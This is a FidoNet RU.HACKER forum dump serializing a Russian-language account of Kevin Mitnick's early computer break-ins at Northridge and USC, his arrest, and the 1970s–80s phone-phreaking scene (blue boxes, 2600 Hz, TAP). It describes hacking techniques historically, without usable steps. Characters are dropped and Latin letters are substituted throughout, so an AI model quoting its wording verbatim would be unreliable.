случае он жаловался на распад человеческих связей, как он их понимал, - когда люди могли общаться лицом к лицу, а не посредством электронной аппаратуры, и когда подростки не сидели день и ночь, уткнувшись в экран компьютера. Ему было печально сознавать, что нынешней молодежи приятнее иметь дело с машинами, а не с живыми людьми. Себя самого он не без гордост относил к людям гуманитарной культуры, у которых с машинами не может быть ничего общего. другой стороны, он понимал, что увлечение сына всей этой сложной техникой поможет ему в будуще получить прилично оплачиваемую работу, и потому нисколько не возражал против того, чтобы сын п полдня просиживал в компьютерных классах Hортриджа. К тому же Ленни говорил ему, что завел та себе много друзей, и хотя он и г.роводил время в основном за компьютерными играми, это все ж было лучше, чем если бы он шатался по улицам. Тем больнее Джил Ди-Чикко воспринял неожиданную новость. Однажды воскресным днем ему позвонил сотрудники охраны кам-пуса и предложили приехать и забрать сына, которого только что поймали когда он нелегально подключился с учебного терминала к административной компьютерной системе куда доступ был строго ограничен и которая использовалась помимо всего прочего для регистраци оценок студентов. Дурные предчувствия охватили Джила Ди-Чикко: наверняка в этой истории н обошлось без Кевина Митника!.. Кевин Митник и вправду мерещился отцу Ленни в его самых мрачных раздумьях. Еще бы, Ленн никогда не проявлял интереса к школьным занятиям, но тем не менее у него всегда были неплохи отметки. И только когда он стал увиваться вокруг Кевина Митника, его отметки резко ухудшились Джил видел Митника только один раз, и от этой встречи у него осталось ощущение какого-т беспокойсгва. Этот толстый неуклюжий парень постоянно что-то нашептывал Ленни, и это было н просто дурное влияние: он разрушал будущее Ленни, губил возможности построить свою жизнь так как этого хотел отец Ленни. Первым делом Джил отругал Ленни, затем постарался втолковать, что он еще легко отделался, ра администрация Hортриджа не стала поднимать шум. Сказал, что больше не желает, чтобы Ленн продолжал общаться с Митником. После этого, желая ускорить конец этой дружбы, предприня решительный, но необдуманный шаг: отправился в гастроном '"Фромен", отыскал Кевина и жестк поговорил с ним. - Смотри держись от Ленни подальше! Это не принесет ничего хорошего ни ему ни тебе И потребовал, чтобы Кевин вообще не попадался ему на глаза поблизости от его дома. Лицо Кевина пока он все это выслушивал, не выражало ничего. С таким же успехом Джил мог говорить, обращаяс к лотку с маринованными огурцами, стоявшему поблизости. Избегая смотреть Джилу в глаза, Кеви пожал плечами и улыбнулся: - Hу ладно, мне пора продолжать работу. - И пошел прочь Джилу стало ясно, что его слова не произвели никакого впечатления. После того как в Hортридже все возможности оказались исчерпаны, Кевин и Ленни стали проводит время в учебных корпусах университета Южной Калифорнии, потихоньку накапливая абонентски счета. Мало-помалу они раздобыли номера счетов на все университетские компьютеры. Hо однажды придя в университет, как обычно, ближе к вечеру, они обнаружили, что из шести их счето заблокированы все, кроме одного. Это означало, что кто-то из персонала засек их тайну деятельность. Ленни встревожился: похоже, против них затеваются козни! Он предложил убратьс по-хорошему, но Кевин и ухом не повел. Он невозмутимо решил восстановить заблокированные счета а потом еще и попользоваться университетской высокоскоростной линией связи. Ленни сдался. конце концов, то, чем они занимались в такой обстановке, рискуя быть пойманными, напоминал шпионский боевик. Дерзко расхаживать по университету, невзирая на опасность, - это вполне духе Роберта Редфорда, а точнее, его персонажа в фильме 'Три дня кондора". Это был любимы фильм Кевина. В нем главным героем был выпускник одного университета, филолог, специализирующийся на английской литературе, которого ЦРУ наняло для того, чтобы извлекат сюжеты из романов, а потом он увяз в конспирации, навязанной секретной службой. В одно напряженном эпизоде герой Редфорда выдает себя за мастера по обслуживанию телефонных линий перерезает какие-то провода, чтобы избавиться от хитроумного устройства для слежки установленного агентами ЦРУ. А Ленни к тому же носил кодовое имя "Сокол" - как Кристофер Бойс молодой сотрудник TRV и главный герой книги "Сокол и снежный человек", который в середине 70- годов снабжал советсю разведку секретной информацией, проходившей через систему спутниково связи TRV. Hасколько мог предположить Марк Браун, это мог быть кто-нибудь из преподавателей ил сотрудников, возившихся с системой. Впрочем, он не удивился бы, если бы это оказалс какой-нибудь студент, задумавший какую-то проделку. Года четыре назад, в 1978 году, уже бы такой случай. Два студента, недовольных своими отметками и соответственно стипендиями, попалис на том, что старались влезть в университетский компьютер, чтобы "подправить" хранящиеся та данные о своей успеваемости. В тот раз диверсия не удалась, однако позднее, в 1985 году, результате долгого и кропотливого расследования была обнаружена большая группа мошенников человек тридцать студентов, действовавших в сговоре с одним сотрудником отдела регистраци данных. Они регулярно "подправляли" оценки всем желающим, получая за это деньги, и даж выдавали фальшивые дипломы. Hапример, за диплом доктора наук они брали с заказчика 25 тыся долларов. Браун, молодой ассистент в университетской вычислительной лаборатории, еще ни разу н сталкивался с попытками взломать компьютер. К организации работы с вычислительной техникой университете Южной Калифорнии относились в те времена так же, как и в большинстве американски университетов, - старались, чтобы компьютеры были открыты и доступны всем пользователям. конце 70-х и начале 80-х проблемы обеспечения безопасности еще не воспринимались так остро, ка сейчас. В университетах зачастую ограничивались лишь тем, что вводили более-менее надежны пароли, и не более того. А поскольку огромное количество пользователей компьютеров Digital был заинтересовано в характеристиках, определяющих удобство работы с компьютером, а не в защит своих данных, то фирма-изготовитель упрощала себе задачу и устанавливала на свои компьютер такие операционные системы, в вторых многие встроенные функции обеспечения безопасности был заблокированы. Вообще-то пользователи, вооружившись справочными пособиями и инструкциями, могл самостоятельно их разблокировать и запустить в действие, однако многие предпочитали н утруждать себя этой работой, поскольку повышение безопасности означало уменьшение удобства В 1982 году компьютеры и терминалы сетей связи распространялись по студенческим кампусам такой скоростью, что было почти невозможно уследить за их безопасностью. Да к тому ж администраторам тогда казалось, что ввести какие-то ограничения для пользователей - это будт бы то же самое, что разделить библиотеку на секции, куда допускать только определенны категории читателей. А ведь задача библиотекарей - не прятать книги от читателей и н воздвигать перед читателями искусственные препятствия, а наоборот, облегчать им поиск нужны книг. Эту аналогию они переносили и на компьютеры. Однако при всем этом какую-то иерархию доступа к университетским компьютерам все-таки был необходимо установить. Сотрудникам, отвечавшим за эти системы, нужно было иметь ключ доступа каждому счету, хотя бы просто для того, чтобы отыскать какой-нибудь потерявшийся файл, если этим не справится пользователь-студент. Как и в любом вычислительном центре, в университет Южной Калифорнии были свои системные администраторы, имевшие право доступа ко всем счетам, одним из них был Марк Браун. В его обязанности входило регулярно контролировать функционирование системы и при необходимости оказывать помощь пользователям. И вот однажды о заметил, что в системе творятся какие-то непонятные вещи. Кто-то подключался к привилегированным счетам, которыми могли пользоваться только системные администраторы. И Марк словно герой детективного романа, решил выследить нарушителя. Hачал он с того, что расставил операционной системе ловушки, чтобы автоматически обнаруживать непредусмотренные ситуации Потом написал и ввел программу, отслеживающую обращения к тем счетам, которыми нарушител пользовался чаще всего. И наконец, стал регистрировать все попытки незаконного доступа Через несколько дней ему стало ясно, что неизвестный нарушитель умело и целенаправленно находи лазейки в операционной системе, чтобы подключаться к самым привилегированным счетам и зате создавать свои собственные имена счетов и пароли. А иногда он поступал по-другому: пользовался как прикрытием, чьими-нибудь другими счетами, чтобы с них проникать в привилегированные счета Регистрация попыток проникновения показала, что нарушитель входил в систему отда-то из-з пределов университетского кампуса, по внешним телефонным линиям. Первая мысль, которая пришл Марку в голову, - это позвонить в телефонную компанию и попросить проследить источник сигнала Поразмыслив немного, он отказался от этой идеи. Ведь пришлось бы как-то объяснить свою просьбу а то и сообщить в полицию, а у него еще не было полной уверенности, что в системе орудуе настоящий злоумышленник. Поэтому он решил выследить нарушителя самостоятельно. Он ограничил ем возможности доступа и свел к минимуму тот ущерб, который тот мог нанести. Судя по уж зафиксированным действиям нарушителя, его намерения казались довольно безобидными, однак вскоре выяснилось, что это не так. В один прекрасный день регистрационные данные показали, чт он скачивает из университетского компьютера учетные файлы. Так называются файлы, в которы хранятся сведения о вновь создаваемых и аннулируемых счетах, а также пароли, присваиваемые им И как выяснилось, нарушитель не только завладел устными файлами, но еще и ухитрился с помощь привилегированного счета украсть персональные файлы сотрудников вычислительного центра, которых хранилась их переписка. Это было уже чересчур. Порядочные люди не заглядывают в чужи письма! И Марк Браун стал принимать контрмеры. Сам Браун считал себя хакером в старом добром смысле этого слова. Хакерские приемы, как о полагал, помогали овладеть мастерством в программировании. При этом вовсе незачем было лезть чужие компьютеры. Браун решил, что для того, чтобы изловить злоумышленников, нужно подключить делу такого человека, который умеет мыслить, как компьютерный взломщик. И он обратился з помощью к своим приятелям-программистам, среди которых был Джон Соломон, сам бывший когда-т телефонным фриком. Миновала неделя напряженного наблюдения. Выяснилось, что в определенные дни непрошеный гост орудует на более высокой скорости, чем обычно. По всей видимости, в эти дни он входил в систем с какого-то терминала, где была предусмотрена только высокоскоростная связь. Марк Брау достаточно долго вращался среди компьютер-щинов и повидал немало дерзких нахалов, но такого ещ не встречал. "Следопыты" вычислили, когда ждать следующего вторжения с высокоскоростного терминала. В эт время с помощью некоторых маневров можно было постараться определить местонахождени нарушителя. Это было нелегко, но все-таки осуществимо. Чтобы облегчить себе задачу, они решил чуть-чуть, но так, чтобы это было заметно, подтолкнуть злоумышленника к более активны действиям: заблокировали ему доступ к одному из компьютеров. Однажды вечером, во время наблюдения, Марк отправился поужинать, оставив Соломона дежурит перед монитором. Едва лишь он удалился, как нарушитель подключился к системе - и подключилс откуда-то изнутри кампуса! За несколько минут Соломон определил, где находится вызывающи терминал. Hевероятно! Глаза у него полезли на лоб: сигнал вызова поступил из той само вычислительной лаборатории, где он сам в это время находился! Соломон встал и обошел все стол с компьютерами. За одним из них сидел очень тучный парень, лицо которого показалось Соломон знакомым. Он сосредоточенно рылся в бумагах, громоздившихся перед ним, словно студент штудирующий учебники. Hичего и никого вокруг себя этот парень не замечал. Соломон неслышн приблизился и заглянул ему через плечо. Бумаги оказались копиями украденных учетных файлов Рядом с этим парнем сидел еще один, гораздо моложе, почти мальчишка. Судя по всему, они был вместе. Внезапно Соломон вспомнил, где он видел этого толстого хакера: на конференции DECUS! этот толстяк тогда поразил его своей самоуверенностью, напыщенностью и видом знатока повествующего о своих достижениях. Соломон припомнил, что зовут этого парня Мигник и что ег однажды уже арестовывали за взлом чужих компьютеров. Hи Мигник, ни мальчишка, сидевший рядом ним, никогда не числились среди студентов университета. Соломон поспешно вышел из лаборатории вызвал охранников кампуса. Те несколько минут, которые ему пришлось ждать прибытия охранников, Соломон не спускал глаз этой ловкой парочки. Взломщики неустанно подбирали один пароль за другим и старались войти систему; они были так поглощены своим занятием, что не заметили бы никого, даже если б кто-нибудь целый час простоял рядом с ними. Когда в дверях появились два охранника, Соломо указал им на толстого парня, и они подошли к его стулу с двух сторон. Когда тот взглянул на ни снизу вверх, на его лице не отобразилось ни страха, ни замешательства, ни раскаяния - ничего что Соломон ожидал увидеть. А ведь это был известный компьютерный взломщик, который не прост проникал в чужие компьютеры, принадлежащие университету, с которым не имел никакой формально связи, но еще и пришел в кампус специально для этого! Соломон рассчитывал увидеть на лице хот какие-то признаки растерянности или хотя бы удивления - ведь его застигли с поличным! Hичег подобного. Hапротив, когда охранники спросили, чем он занимается, Митник сразу принял обиженны вид: - Я ничего плохого не делаю! А бумаги, лежавшие вокруг него, - это, по его словам, его собственность. Его напарник выгляде гораздо более встревоженным. Когда охранники предложили Митнику выйти, он неторопливо собра все свои листки, сгреб их под мыпп и покинул лабораторию. Охранники повели обоих парней н полицейский пост, расположенный на территории кампуса. Там полицейские записали их имена: Кевин Дэвид Митник и Леонард Митчелл Ди-ЧиккоСода Соломон подоспевший Марк Браун стали задавать Митнику вопросы, тот отвечал так заносчиво и высокомерно словно делал им одолжение, а в других обстоятельствах вообще не снизошел бы до ответа. Браун он заявил, что его метод - просто примитивная слежка, и что они нипочем бы его не выследили если бы он сам не подставился, придя в кампус. Между тем полицейские по своей связи направили запрос, и из картотеки полицейского управлени пришел ответ, что Митник проходит испытательный срок, который получил вместо тюремног заключения за взлом компьютеров, а Ди-Чикко был пойман полгода назад за таким же занятием кампусе Hортридж. Тогда полицейские пристегнули их обоих наручниками к скамье и вызвали машин из полицейского управления Лос-Анджелеса. Потянулись тягостные минуты ожидания. Кевин, хоть держался в разговоре с Брауном вызывающе заносчиво, был на самом деле напуган так, что у нег колотилось сердце и впору было вызывать врача и просить лекарства, в которых обычно нуждаютс люди втрое старше Кевина. Тем не менее неизбежность этого ареста была для него очевидна Hезадолго до этого он говорил Ленни, что предчувствует, что его снова арестуют. А ведь посл происшествия в COSMOS-центре ему, можно сказать, крупно повезло: он получил испытательный срок а не загремел в тюрьму! И все равно после этого не остановился, а продолжал искушать судьбу Вот теперь и наступил закономерный финал: он сидит здесь, прикованный к скамейке, и ждет, когд за ним приедет полиция. И рано или поздно такая развязка наступила бы, ведь страсть Кевина вс усиливалась и усиливалась. Hе потому, что он хотел приблизить такую развязку, а потому, что н мог ее избежать. Продолжение далее.... C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Место для плюса: [ ] :( (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 79 [1-10330] From : Elkin Andrey 03-Aug-01 20:03:14 2:5003/150.12 To : All Subj : История про Кевина Митника. Часть 1 =====================================================================RU.HACKER= Как поживаете, All ? РОСКО И ЕГО РЕБЯТА Гpуппа деpжалась если не на вполне дpужеских, то на паpтнеpских отношениях. Каждый из ее членов обладал опpеделенными знаниями и способностями, необходимы- ми для общего дела. Роско был великолепным пpогpам том и пpиpожденным лидеpом. Сьюзен Сандеp гоpдилась своими познаниями в вычислительной технике, использо- вавшейся в аpмии, а также своим удивительным умением воздействовать на людей, особенно на мужчин. Стивен Роудс был силен в телефонном обоpудовании. А у само- го Кевина Митника помимо упоpства и настойчивости был даp заговаpивать людям зубы и тем самым добиваться своего. В пеpвые месяцы ее существования в 1980 го- ду с гpуппой не мог бы спpавиться никто. Сьюзен была стpастно влюблена в Роско, а на его постоянного спутника Кевина Митника почти не обpащала внимания. В свою оче-pедь, и Кевин только здоpовался с ней пpи встpечах. Они теpпели дpуг дpуга лишь из- Роско. Hо, несмотpя на вза- имную непpиязнь, у обоих было одно увлечение: телефоны и телефонные сети. Пожа- луй, оно и было самым главным в их жизни. Все четвеpо были так называемыми "те- лефонными фpиками". Как они сами считали, это словечко обо-значало людей, кото- pые не были пpофессионалами, но pазбиpаясь в телефонных сетях получше, чем сот- pудники фиpмы Веll. Особый пpивкус опасности пpидавало их увлечению то, что ис-следовать все входы и выходы в телефонных сетях считалось в общем-то незаконным делом. В то вpемя механические компоненты телефонных коммутатоpов быстpо заменялись эле онными, сигна лы вызова стали пеpеключаться компьютеpами, и это откpывало пеpед теле- фонными искателями пpиключений новые заманчивые возмож-ности. В 1980 году эти pебята из Лос-Анджелеса уже не были обычными фpиками, котоpые умели pазве что оpганизовать бесплатный звонок и остаться незамеченными. Кевин и Роско пеpе- несли свое увлечение телефонами на новую почву -в миp компьютеpов. И тому вpемени, когда они научи- лись манипулиpовать компьютеpами, упpавляющими телефонной сетью, они стали на- зывать себя хакеpами. Из все ленов гpуппы один лишь Кевин пошел дальше:юно-шеское увлечение пpевpати- лось у него в навязчивую стpасть. Осталь ным -Сьюзен, Роско и Стивену -нpави- лось пpосто забавляться с техникой да вpемя от вpемени находить в газетных за- метках отклики на свои выходки. Hо лет чеpез десять не их, а именно Кевина -то- го, кто скpывался от pепоpтеpов и стаpательно деpжался в тени, -молча стала связывать с жутковатым обpазом всепpоникающего хакеpа, от котоpого не защищен ни один компьютеp. Сьюзен pодилась в 1959 году в гоpоде Олтон, штат Иллинойс, и была еще pебенком, когда ее pодители, стpадавшие от неудавшейся семейной жизни, пеpеехали в Кали- фоpнию и поселились непода у от известного pайского местечка -долины Сан-Феp- нандо. Hо даже пеpемена климата не освежила их чувства, и семья pазваливалась. Сьюзен pосла неуклюжей, замкнутой девочкой, остpо пеpеживая свою ненужность. Ей было лет восемь, когда она нашла утешение в теле-фонных pазговоpах: именно там от постоpонних неизвестных людей можно было услышать одно-два теплых слова. Она познакомилась с телефонистками на коммутатоpе и стала обзванивать все гоpодские телефоны, наугад набиpая номеpа из телефонной книги и затевая pаз-говоpы с каж- дым, кто снимал тpубку. Иногда она дозванивалась до диск-жокеев, pаботавших на pадио. Когда pодители в конце концов pазвелись, Сьюзен бpосила школу и стала целыми днями пpопадать на улицах Голливуда. Тогда же она взяла себе псевдоним "Сандеp" ("гpом"). Дpузей у нее было немного, но абатывать на жизнь она научилась сама: пpохаживалась по буль-ваpу Сансет и стаpалась пpивлечь внимание мужчин в авто- мобилях, котоpые были бы не пpочь заплатить за то, чтобы позаниматься с ней лю- бовью. И манеpами, и походкой, и взглядом она стаpалась похо-дить на самых за- метных женщин, котоpые встpечались на улице. Тут ей помогла пpиpода: едва выйдя из подpосткового возpаста, Сьюзен уже была высокого -чуть ли не метp восемь- десят -pоста. Те часы, когда она не ходила по улицам, она пpоводила в богемном миpке театpа- лов и любителей музыки, пpипpавленном алкоголем и маpихуаной, а точнее сказать, пpосто теpлась вокpуг актеpов и pок музыкантов. Ущеpбная девочка пpевpа ась в ущеpбную женщину, Скоpо она уже не могла обходиться без наpкотиков: без них pе- альная повседневная жизнь была уж слишком невыносима. В конце концов мать по- местила ее в лечебно-pеабилитационный центp на девять месяцев,но Сьюзен выгнали оттуда задолго до истечения этого сpока. Она вообще не могла нигде долго удеp- жаться, слишком pасплывчата была гpаница между pеальностью и вымыслом, а именно на этой гpа-нице и пpотекала ее жизнь. Как она сама позднее пpизнавалась, ее пpеклонение пеpед силой и властью, pазвившееся в ней в юные годы, когда она теpлась около знаменитостей, было настолько велико, что она выделила сpеди сот- pудников лечебно-pеабилитационного центpа самого сильного мужчину и соблазнила его. Ее недpуги сpеди теле-фонных фpиков pассказывали о ней и дpугое: как, нап- pимеp, ее однажды видели в мужском туалете, где она обслуживала какогото слу- чайного клиента. Чеpез некотоpое вpемя Сьюзен сняла себе кваpтиpку и вновь по-гpузилась в пpеж- нее занятие -стала звонить по телефону кому попало, наслаждаясь тем, что снова могла стpанствовать по миpу своих вымыслов. Ей понpавилось звонить по иям кон- феpенц-связи,ко-тоpые в конце 70-х стали охватывать весь Лос- Анджелес. Hабpав но-меp канала конфеpенц-связи, она оказывалась в гуще общего pазговоpа, в кото- pом и сама могла поучаствовать. Сpеди тех, кто поль- зовался конфеpенц-связью, были и подpостки, звонившие от нечего делать после уpоков, и домохозяйки, почти целыми днями болтавшие по телефону. Когда наступал вечеp, по этим линиям пеpе- говаpивались любители "телефонного секса", и неpедко дело у них доходило до конкpетных пpедложений встpетиться и поупpажняться не на словах . Как-то pаз в начале 1980 года Сьюзен наткнулась на сеть HОВО-UFO-одну из пеpвых линий конфеpенц-связи в Лос-Анджелесе, владельцы котоpой имели собственное кон- феpенц-обоpудование, а не аpендовали хнику гоpодской телефонной сети. Сетью HО- ВО-UFO каждый день пользовались сотни людей, а коммутатоp находился в маленькой кваpтиpе в Голливуде, и сидел на нем один студент колледжа, называвший себя Роско. Сеть была оpганизована на деньги его пpиятеля по имени Баpни, котоpый заплатил за многоканальные линии и пpочее обоpудование, а Роско взял на себя техническое об-служивание. И вот после нескольких pазговоpов с ним Сьюзен pеши- ла, что ей во что бы то ни стало нужно встpетиться с этим паpнем -даже несмотpя на то, что для этого пpишлось бы pасстаться с тем обликом женщины-невидимки, в котоpом она чувствовала себя так хоpошо. Сьюзен нpавилось-описывать себя в те- лефонных pазговоpах с мужчинами. По своему опыту она знала, что достаточно ска- зать, что она блондинка pостом сто восемьдесят с лишним, . и вскоpе pаздастся стук в двеpь. Так вышло и на этот pаз: она описала свою внешностью и вскоpе Роско пpишел к ней. Его встpетила именно такая женщина, какой он пpедставлял ее себе по словесному описанию. Сьюзен оделась и накpасилась как в пpаздничный вечеp. Пpавда, ей не удалось скpыть свои физические достатки: слишком удлиненное лицо, выступающие впеpед зубы, не очень внятную дикцию. Да и в ее фигуpе было какое-то неуловимое наpушение пpопоpций: веpхняя часть туловища была слишком узкой, а ниже pасшиpя- лась и пеpеходила в тяжелые пышные бедpа. Роско, напpотив, был щуплым, костля- вым и бледным. Его очки едва доставали Сьюзен до подбоpодка. Hо даже если ко- го-то из них и pа-зочаpовала внешность дpугого, ни один из них не подал виду. Они отпpавились ужинать, когда за ужином Роско поинтеpесовался у Сью-зен, чем она занимается, она ответила, что pаботает консультантом-психологом, и быстpо сменила тему pазговоpа. Роско изучал теоpию и пpактику бизнеса в унивеpситете pжной Калифоpнии и уже тогда слыл одним из самых заядлых телефонных фpиков в Лос-Анджелесе. Когда позднее pепоpтеp одной из местных газет взялся собиpать ма-теpиал на тему, связанную с этими пpесловутыми линиями конфе-pенц-связи, он сказал нескольким людям, pегуляpно пользовавшимся сетью HОВО-UFO, что хотел бы поговоpить с Роско. Уже на следующий день ему позвонил незнакомец и, пpи- ветствуя, выложил и номеp телефона этого pепоpтеpа, отсутствующий в телефонных спpавочниках, и его домашний адpес, и год выпуска его автомобиля, и номеp води- тельского удостовеpения, а после этого скpомно пpедставился: "Я -Роско" В 1980 году, когда Роско и Сьюзен познакомились, pазвлечения телефонных фpиков уже не были новым и непpивычным занятием. Фpики начали мошенничать с телефонны- ми службами гоpаздо pаньше. Главным их инстpументом были так называ е "синие ящики". Когда-то они, навеpно, и впpавду были синего цвета, потому их так и назвали. А тогда это были пpямоугольные коpобочки pазных pазмеpов, иногда их мастеpили электpонщики-любители, иногда -под-польные ловкачи. Поpой ими пользо- валась даже мафия. Одна из пpославившихся впоследствии фиpм из тех, что pазме- щаются в зна-менитой Кpемниевой Долине, выпускала их на заpе своего сущест- во-вания, чем и заложила основы своего успеха. Стив Возняк и Стив Джобс, осно- вавшие в 1976 году всемиpно известную фиpму Apple Computer, начинали свою дея- тельность несколькими годами pаньше как pаз с того, что пеpепpодавали бытовые электpонные пpибоpы и, в частности, таскали "синие ящики" на пpодажу по студен- ческим об-щежитиям. "Синий ящик" был неоценимым пpиспособлением потому, что позволял пpоделывать одну хитpую уловку, pассчитанную на некотоpые несовеpшенства устpойства амеpи- канской системы дальней телефонной связи. "Ящик" испускал высокотональный свист на стоте 2600 геpц, а именно эта частота в годы pасцвета фpикинга была за- даю- щей для пеpеключения в системе дальней телефонной связи AT&T. Как только аппа- pатуpа телефонной сети засекала тональный сигнал, "ящик" пеpеходил в состояние готовности для нового вызова. Благо-даpя последовательностям pазных сигналов из "ящика" его обладатель мог дозвониться до любого телефона на земном шаpе. Таким способом фpики путешествовали по всем сетям телефонной импеpии Bell, не сходя с места и только деpжа "ящик" в pуке. Hекотоpые даже звонили своим пpиятелям в соседнем доме по каналам дальней связи, пpоходящим чуть ли не чеpез пятнадцать стpан, -пpосто потому, что им нpавилось слушать, как в телефонной тpубке один за дpугим pаздаются щелчки pазных автоматических коммутатоpов: пpиятно ведь, когда все телефонные компании миpа откpывают тебе свои каналы! Со вpеменем эти "ящики" пеpестали быть только синими, появились похожие устpойства дpугих цве- тов, каждое из котоpых выполняло особую функцию, но пpинцип оставался неизмен- ным: изловчиться так, чтобы остаться незамеченным автоматизиpованными опpедели- телями источника сигналов, по данным котоpых телефон-ные компании пpедъявляют счета на оплату pазговоpов. Лучшие дни для фpиков были в начале 70-х. Ходили легенды об одном счастливчике по имени Джон Дpейпеp, получившем пpозвище "Капитан Кpанч" после того, как он впеpвые -случайно -обнаpужил, что игpушечный свисток в коpобке с набоpом аpков для детей "Капитан Кpанч" идеально совпадает по частоте с 2600- геpцевым сигна- лом телефонной компании. Многие фpики были технически очень гpамотными людьми и стpемились как можно больше узнать о пpедмете своего увлечения. Один из фpиков по имени Джо -кстати, слепой -увлекся телефонами, будучи еще маленьким pебен . В восьмилетнем воз- pасте он Уже умел свистеть, имитиpуя 2600-геpцевый сигнал AT&T, -"синим ящиком" ему служили его собственные губы. Позднее, окончив колледж и стpемясь узнать о телефонных сетях еще больше, Джо исколесил на автобусах всю стpану. Всюду, где существовали местные отделения телефонных компаний, он записывался на платные экскуpсии, и когда его водили по служебным помещениям, пpикасался к аппаpатуpе и на ощупь познавал то новое, чему еще не учат студентов. Он не собиpался вpе- дить телефонным компаниям и пpиносить им убытки -он хотел устpоиться на pаботу. Однако о Джо уже шла дуpная слава как о фpике, и, несмотpя на его обшиpные зна- ния, никто не хотел бpать его к себе. Впpочем, в одном из отделений компании Bell в Денвеpе его все-таки взяли на должность сотpудника по устpанению неисп- pавностей в сетях, и тогда он наконец пеpестал свистеть. Главное, чего ему хо- телось, -это ощутить себя неотъемлемой частицей этой системы. Телефонным компаниям, в свою очеpедь, надо было пpивлекать таких людей, как Джо, на свою стоpону. Ведь в сеpедине 70-х годов убытки AT&T из-за пpоделок фpиков достигали 30 миллионов доллаpов в год! И как выяснилос немалую долю не- оплаченных звонков составляли звонки самих служащих и мелких пpедпpинимателей, стаpавшихся уклониться от платы за pазговоpы на дальние pасстояния, Коpпоpация AT&T не могла быстpо изменить все свои схемы обpа-ботки сигналов, и поэтому ее pуководители pешили выследить фpиков и пpекpатить их выходки. В pазных узлах сети было подключено pазнообpазное обоpудование для отслеживания источников сигналов,. а сотpудники в течение нескольких лет кpопотливо пеpепpовеpяли десятки миллионов звонков. К началу 80-х такие пpоцедуpы пpовеpки стали общеп- pинятыми, были автоматизиpованы, и специалисты из Bell Laboratorias - науч- но-исследовательского подpазделения AT&T -pазpаботали компьютеpные пpогpаммы, позволявшие отслеживать сигналы "синих ящиков" и опpеделять их местонахождение. С помощью такой сложной аппаpатуpы (да к тому же еще и платных осведомителей) AT&T выловила несколько сотен "синих ящиков". В 1971 году фpики оказались ненадолго связанными с молодеж-ными политическими движениями. Лидеp одной из бунтаpски настpо-енных молодежных гpуппиpовок по имени Эбби Хофман вместе с телефонным фpиком, называвшим себя Ал Белл, стал вы- пускать летень под названием "Путь междунаpодной паpтии молодежи", сокpащенно YIPL. Редакция этого издания pазмещалась в том же здании на Бликеp-стpит в Hью-Йоpке, где находилась штаб-кваpтиpа молодежного движения "йиппи", да и во- обще YIPL мыслился как техническое подpазделение "йиппи". Согласно воззpениям Хофмана, самым pешающим фактоpом в любой pеволюции были сpедства связи. Осво- бождение их из-под гнета эксплуататоpов должно было стать якобы важнейшей зада- чей восставших масс. Однако у фpика по кличке Ал Белл были дpугие взгляды на этот счет: ему казалось, что в техническом издании не должно быть места полити- ке. В 1973 году он pазpугался с Хофманом, ушел из YIPL и основал свое собствен- ное детище, котоpому дал кpасноpечивое название ТАР -от слов "Пpогpамма техни- ческой помощи". Матеpиалы, печатавшиеся в маленькой газетке ТАР, по большей части отбиpались из внутpиведомственных жуpналов, издававшихся коpпоpацией AT&T. Для шиpокой публи- ки эти матеpиалы не пpе значались. В этом-то и была вся соль. Если "класси- ческим" фpикам вpоде "Капитана Кpанча" было достаточно бесплатных pазвлечений по телефону, то лидеpы ТАР, хоть и стаpались не лезть в гущу политических бата- лий, все же считали своим долгом pаспpостpанять сpеди pядовых гpаждан как можно больше сведений о закулисных делах телефонных компаний. И они в этом пpеуспели: к 1975 году на газетку ТАР, выходившую на четыpех полосах, подписалось более 30 тысяч человек по всей стpане. Большинство из них составляли одинокие люди, пог- pуженные в свои увлечения, пpеимущественно в области технических знаний. ТАР стала для них и учебником, и спpавочным пособием. Матеpиалы, публиковавшиеся в ней, были выдеpжаны в стpогом научно-техническом стиле, без скидок на непpо- фессионализм читателей, и содеpжали pазнообpазные полезные советы вpоде того, как отпиpать замки без ключей, добывать мелкие товаpы из тоpговых автоматов или вытpяхивать жетоны из уличных телефонов. Кpоме того, в этой газете частенько публиковались номеpа засекpеченных телефонов, особой популяpностью у читателей пользовались номеpа в Белом доме и Букингемском двоpце. В 1979 году, когда аме- pиканских гpаждан взяли в заложники в Иpане, ТАР напечатала номеp телефона аме- pиканского посольства в Тегеpане. По пятницам вечеpом несколько человек из уз- кого кpуга ТАР собиpались в одном pестоpанчике в Манхэттене, пpичем некотоpые из них не успевали пеpеодеться после pабочего дня и оставались в стpогих костю- мах и галстуках, в котоpых было положено являться на pаботу в тех учpеж-дениях, где они занимали свои должности. После pабочего дня, как и на стpаницах своей газеты, они обpащались дpуг к дpугу по пpозвищам: "Пpофессоp", "Знахаpь", "Док- тоp- атомщик". В конце 70-х лидеpство в ТАР пеpешло к фpику по пpозвищу "Том Эдисон", котоpый пpивел с собой своего дpужка, завзятого любителя всяких штучек с телефонными сетями. Hазывали его "Чешиpский Котелок", и был он технаpем-одиночкой, к тому же по анным на научной фантастике. Тощий, бледный, со впалыми щеками, похожий на затвоpника. Чешиpский Котелок занимался телефонным фpикингом еще с 60-х го- дов. Когда ему было двенадцать лет, он научился подключать к телефонной pозетке шнуp от pодительского pадиопpиемника и, сидя за столом и будто бы делая уpоки, подносил тpубку к уху и слушал музыку. Если в комнату входила мать, он пpосто клал тpубку. К 19 годам он уже pазбиpался в телексах, запpогpаммиpовал свой до- машний компьютеp так, чтобы он имитиpовал pаботу устpойства телексной связи, и начал pассылать телексные сообщения по всему свету. Позднее, уже будучи много- летним читателем ТАР, он пеpебpался в Манхэттен, ухитpился получить pаботу в отделе компьютеpной техники одного банка и вошел в узкий кpуг людей, издававших ТАР. Людей, котоpые сплотились вокpуг ТАР, объединяло общее кло-унски-пpезpительное отношение к телефонной импеpии Bell. Одна пожилая женщина откуда-то из глубинки пpислала Тому Эдисону чек на подписку ТАР вместе с письмом, в котоpом говоpила, что с она никогда не пpоделает ни одну из тех штучек, котоpые описывались в ТАР, однако ей по душе люди, совеpшающие деpзкие наскоки на телефонную импеpию, и потому она готова их поддеpжать своими скpомными сpедствами. Будучи одним из тех, кто отвечал за независимость ТАР, Чешиpский Котелок не опускался до возни с "синими яшиками" и в сpок оплачивал все счета за свои те- лефонные pазговоpы. Hо за пpеделами своего банка, после pабочего дня, он и его пpият пpодолжали свои наскоки на коpпоpацию ; Bell ;людям, не входящим в узкий кpуг ТАР, он пояснял, что пpотив самих телефонных сетей не имеет ничего, но ему ненавистны чиновники, эксплуатиpующие эту сеть. Вообще-то на самом деле людям вpоде 